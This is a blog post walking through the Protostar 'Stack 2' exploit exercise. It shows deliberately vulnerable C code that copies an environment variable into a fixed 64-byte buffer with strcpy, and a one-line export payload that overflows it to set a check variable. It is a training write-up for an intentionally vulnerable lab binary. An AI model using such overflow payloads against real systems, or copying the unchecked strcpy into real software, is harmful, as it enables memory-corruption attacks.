Sunday, December 9, 2012

exploit-exercises Protostar: Stack 2

Continuing with Exploit-Exercises' Protostar wargame, this time tackling on Stack 2 challenge which introduces to the use of environment variables.
The source code of the target binary is provided as follow:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
char *variable;

variable = getenv("GREENIE");

if(variable == NULL) {
errx(1, "please set the GREENIE environment variable\n");
}

modified = 0;

strcpy(buffer, variable);

if(modified == 0x0d0a0d0a) {
printf("you have correctly modified the variable\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}

}
As the previous challenge, we have a 64 bytes offset. However, modified variable should match 0x0d0a0d0a value. Second difference is that the payload is read from the environment variable GREENIE using the getenv() library call. The content is then copied into buffer variable. We will use the shell's builtin command export to set the value of the GREENIE env variable.
user@protostar:~$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
user@protostar:~$ /opt/protostar/bin/stack2

you have correctly modified the variable

No comments:

Post a Comment